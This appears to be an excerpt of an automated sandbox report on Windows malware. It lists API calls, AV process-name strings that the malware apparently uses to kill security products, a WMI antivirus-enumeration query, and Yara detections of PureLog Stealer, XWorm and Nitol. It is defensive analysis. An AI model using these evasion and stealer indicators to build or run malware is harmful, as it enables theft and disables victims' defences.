Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	27_2_029B5BD7
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: GetLocaleInfoA,	27_2_029BA810
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: GetLocaleInfoA,	30_2_00417A20
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: GetLocaleInfoA,	30_1_00417A20
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	36_2_029D5ACC
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	36_2_029D5BD7
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: GetLocaleInfoA,	36_2_029DA810

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\alg.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\alpha.pif	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\AppVClient.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTF44A.tmp VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTF45B.tmp VolumeInformation
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\System32\msdtc.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\System32\Locator.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\SensorDataService.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\snmptrap.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\Spectrum.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02AF920C GetLocalTime,

4_2_02AF920C

Source: C:\Windows\System32\AppVClient.exe

Code function: 22_2_00740080 VirtualFree,VirtualFree,VirtualAlloc,GetUserNameW,GetComputerNameW,GetComputerNameW,

22_2_00740080

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02AFB78C GetVersionExA,

4_2_02AFB78C

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Nitol

Source: Yara match

File source: Process Memory Space: wdmvmswJ.pif PID: 2056, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 38.2.wdmvmswJ.pif.1e8fecae.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.213f0000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.852.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1eb40f08.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e720000.1151.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.268b0f08.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e760000.1094.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.922.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e750000.1112.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1fd46478.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.213f0000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e610000.1102.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e780000.1055.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1fd45570.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e720000.1149.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e750000.1111.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.904.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.279e5570.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e610000.1103.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6f0000.915.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.27a02b90.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.3.wdmvmswJ.pif.244ea0a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e770000.1053.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.265becae.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e760000.1115.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e730000.1154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.941.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e710000.927.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1eb40000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1066.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1064.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e780000.1058.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1eb40000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6f0000.914.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e760000.1093.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.848.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.1060.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.919.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6d0000.1068.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.wdmvmswJ.pif.1c684410.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.865.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.1160.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e710000.845.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1e8fecae.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.29240000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1062.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e710000.846.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.268b0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1067.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e760000.1092.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.1161.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e730000.1155.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.853.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.849.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e620000.1099.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e710000.925.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.279e6478.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.29240000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.921.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e730000.1152.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1fd62b90.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e620000.1100.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1061.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.851.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e720000.1148.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.27a02b90.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e620000.1097.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.1162.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.928.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6b0000.1095.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.918.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.942.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e720000.1150.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.3.wdmvmswJ.pif.244ea0a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.917.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e5f0000.1165.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.wdmvmswJ.pif.1c684410.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e620000.1101.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e770000.1054.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6c0000.1163.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e780000.1056.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1e8ffbb6.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6f0000.913.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e750000.1110.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.268b0f08.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e620000.1098.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e730000.1153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e760000.1002.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e710000.924.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e780000.1057.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.265becae.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.1159.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1eb40f08.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.265bfbb6.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1065.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e610000.1096.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.265bfbb6.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1fd62b90.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1fd45570.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6f0000.843.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e710000.923.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.929.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e770000.1052.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6c0000.1164.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1fd46478.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.268b0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1e8ffbb6.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.850.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.903.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.279e6478.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e8e0cd8.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.847.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.920.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1063.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.279e5570.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6f0000.916.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.1158.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6f0000.844.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e8e0cd8.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.866.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.1059.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e770000.1051.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000002.1848536058.000000001FD45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.1663470654.00000000244EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1777354937.000000002657E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1848938336.00000000213F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1798010411.0000000029240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1840076965.000000001E8BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1553023677.000000001E8E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1795060712.00000000279E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1840971745.000000001EB40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1782173123.00000000268B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.1766990632.000000001C684000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected XWorm

Source: Yara match	File source: 00000026.00000002.1842028459.000000001EDB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1842028459.000000001ED41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1782690545.0000000026A57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wdmvmswJ.pif PID: 2056, type: MEMORYSTR

Remote Access Functionality

Yara detected Nitol

Source: Yara match

File source: Process Memory Space: wdmvmswJ.pif PID: 2056, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 38.2.wdmvmswJ.pif.1e8fecae.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.213f0000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.852.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1eb40f08.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e720000.1151.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.268b0f08.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e760000.1094.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.922.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e750000.1112.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1fd46478.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.213f0000.13.unpack, type: UNPACKEDPE
